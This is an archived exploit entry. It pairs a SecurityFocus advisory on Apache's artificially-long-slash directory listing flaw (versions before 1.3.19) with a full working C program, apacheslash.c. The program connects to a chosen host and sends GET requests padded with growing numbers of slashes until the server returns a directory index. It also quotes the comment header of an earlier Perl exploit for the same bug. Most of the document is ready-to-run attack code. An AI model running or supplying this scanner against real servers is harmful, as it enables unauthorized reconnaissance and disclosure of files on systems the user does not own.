source: http://www.securityfocus.com/bid/2503/info
 
Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems.
 
A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents.
 
This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. 

/*
Program: apacheslash.c
Original Date: 2-21-02
Version: 1.0
Platform: Linux (compiled on SuSE 7.3)
c0der: st0ic
site: www.fsix.net
e-mail: st0ic@blackcodemail.com

Revised:
	NONE thus far

Description: This program tests an Apache installation for the "Apache Artificially Long Slash Path 
Directory Listing Exploit."  See SecurityFocus.com BID 2503 - http://online.securityfocus.com/bid/2503 

Compile: gcc apacheslash.c -o apacheslash

Stuff: I know theres already 3 Perl scripts that test this bug out, but there execution time is horrible
so I was bored and decided to recode it in C for execution speed sake. On my box, I think it took
about 8 mins to send 1000 /'s to apache with apache2.pl. It takes about 2 seconds with this program.
BTW, SuSE 7.3 comes with Apache 1.3.20, which is NOT vulnerable :-). Check out the securityfocus.com
BID 2503 to find out whats vulnerable and whats not.

I also included the comments from apache2.pl exploit which was modified
by Siberian of sentry-labs.com. Read below for the details:

/*************************************************
#!/usr/bin/perl
#
# orginal by farm9, Inc. (copyright 2001)
# new modified code by Siberian (www.sentry-labs.com)
#
########################################################################################
#
# Note: This isn't the orginal exploit! This one was modified and partly rewritten. 
#
# Changes:
#
# - help added (more user firendly :-) )
# - messages added 
# - exploit is now able to be executed on WinNT or 2k.
# - uses perl version of BSD sockets (compatible to Windows)
# 
# Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some
# of the code and made it esaier to use and cross platform compatible.
# The old verion used a esaier but not that compaible way of socket stream communication.  
# Any network code was replaced by cross platform compatible BSD sockets.
# (much better than any other stream method :-) )
# 
# Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32)
#
# Original comment and source is attached below.
#
########################################################################################
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info:  This exploit tricks apache into returning a Index of the a directory
#    even if an index.html file is present.  May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
#	   very specific cases would feed stat() a filename that was longer than
#	   stat() could handle.  This would result in a condition where stat()
#	   would return 0 and a directory index would be returned instead of the
#	   default index.html.
#
# Code Fragment: /src/main/http_request.c
#    if (strchr(new_file, '/') == NULL) {
#        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
#        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
#        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
#        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */	/*
#        if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important part
#            rnew->finfo.st_mode = 0;
#        }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
#	      The directory must also have the following Options enabled:
#             Indexes and MultiView
#	      Some OS's have different conditions on the number of character
#	      you have to pass to stat to make this work.  If stat doesn't
#	      return 0 for path names less than 8192 or so internal apache
#	      buffer checks will stop this exploit from working.
#
# 	      Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache for me
#	  while i was trying to figure out what had to be enabled to make this
#	  exploit work.  Also thanks to rfp for pointing out that MultiView
#	  needed to be enabled.
#
# More Greets:  Jeff for not shooting me :) <All your Cisco's belong to us>
#               Anne for being so sexy <I never though corporate espionage
#                   would be so fun>
#               All my homies at farm9
#               DJ Charles / DJ NoloN for the phat beats
#               Marty (go go gadget snort)
#               All my ex-bees
#               RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up.  Have fun.
-----snip snip----
**************************************************/

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

char tmp[10240];
char output[10240];
char *get = "GET ";
char *slash = "/";
char *http = " HTTP/1.0\r\n";
char *end = "\r\n\r\n";
int c, x;
int port;
int low;
int max;
int sockfd;
int bytes_recieved;
int count;
char *addr;

struct sockaddr_in dest_addr;
struct hostent *he;

void usage(char *ptr)
{
	fprintf(stderr, "\n\t%s <-h host> <-p port> <-l LOW> <-m MAX>", ptr);
	fprintf(stderr, "\n\tExample: %s -h 127.0.0.1 -p 80 -l 1 -m 1000\n", ptr);
	fprintf(stderr, "\n\tLOW is how many /'s to start with and MAX is how many /'s to end with.\n\n");
	exit(1);
}


int main(int argc, char *argv[])
{
	printf("\n\t[       apacheslash.c     ]");
	printf("\n\t[      c0ded by st0ic     ]");
	printf("\n\t[         Fsix.Net        ]");
	printf("\n\t[ st0ic@happyhack.zzn.com ]\n\n");

	while ( ( c = getopt(argc, argv, "h:p:l:m:") ) != -1)
	{
		switch(c)
		{
			case 'h':
			{
				addr = optarg;
				break;
			}
			case 'p':
			{
				port = atoi(optarg);
				break;
			}
			case 'l':
			{
				low = atoi(optarg);
				break;
			}
			case 'm':
			{
				max = atoi(optarg);
				break;
			}
			default:
				usage(argv[0]);
		}
	}

	if ( low > max || addr == NULL )
		usage(argv[0]);

	if ( (he = gethostbyname(addr)) == NULL)
	{
		perror("gethostbyname");
		exit(1);
	}

	dest_addr.sin_family = AF_INET;
	dest_addr.sin_addr = *( (struct in_addr *) he->h_addr);
	dest_addr.sin_port = htons(port);
	memset (&dest_addr.sin_zero, 0, 8);
	
	printf("\t\n....Working....\n");
	
	while (low <= max)
	{
		count = low;
		bzero(tmp, sizeof(tmp) );
		
		if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0) ) == -1)
		{
			perror("socket");
			break;
		}

		if (connect (sockfd, (struct sockaddr_in *) &dest_addr, sizeof(dest_addr) ) == -1)
		{
			perror("connect");
			exit(1);
		}
		
		strcpy(tmp, get);
		
		/* copy the necessary slashes. */
        for(x = 0; x < count; x++)
			strcat(tmp, slash);
		
		strcat(tmp, http);
		strcat(tmp, end);
		
		send(sockfd, tmp, sizeof(tmp), 0);
		
		bytes_recieved = 1;
		while(bytes_recieved > 0)
		{
			bytes_recieved = recv(sockfd, output, sizeof(output), 0);
			if ( (strstr(output, "Index of") ) != NULL)
			{
				printf("\n\tNumber of \"/\"'s required to generate a directory listing = %d\n", low);
				close(sockfd);
				exit(0);
			}
		}
		
		low++;
		close(sockfd);
	}
	
	printf("\nHost does not appear to be vulnerable. Maybe try some different numbers...\n");
	
	return 0;
}
